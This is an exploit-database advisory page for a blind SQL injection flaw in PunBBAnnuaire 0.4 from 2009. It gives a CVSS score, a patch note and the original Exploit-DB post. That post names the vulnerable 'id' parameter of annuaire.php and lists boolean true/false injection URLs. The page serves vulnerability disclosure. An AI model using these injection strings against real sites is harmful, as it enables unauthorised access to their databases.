PunBBAnnuaire - exploit.company

vendor:

PunBBAnnuaire

by:

Metropolis

7,5

CVSS

HIGH

Blind Sql Injection

CWE

Product Name: PunBBAnnuaire

Affected Version From: 0.4

Affected Version To: 0.4

Patch Exists: YES

Related CWE: N/A

CPE: a:punres:punbbannuaire

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PunBBAnnuaire <=0.4 Blind SQL Injection Vulnerability

The vulnerability exists in PunBBAnnuaire version 0.4. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can allow the attacker to inject malicious SQL queries and gain access to sensitive information from the database.

Mitigation:

Upgrade to the latest version of PunBBAnnuaire.

Source

Exploit-DB raw data:

PunBBAnnuaire <=0.4 Blind SQL Injection Vulnerability
========================================================

####################################################################
.:. Author : Metropolis
.:. Home : http://xrayoptics.by.ru/
.:. Script : PunBBAnnuaire
.:. Version : 0.4
.:. Download Script: http://www.punres.org/download.php?id=1737
.:. Bug Type : Blind Sql Injection

####################################################################

===[ Exploit ]===

/annuaire.php?action=site&id=1[ Blind SQL INJECTION ]


www.site.com/forum/annuaire.php?action=site&id=1 and 1=1 <-- true

www.site.com/forum/annuaire.php?action=site&id=1 and 1=2 <-- false



####################################################################

Vive la France !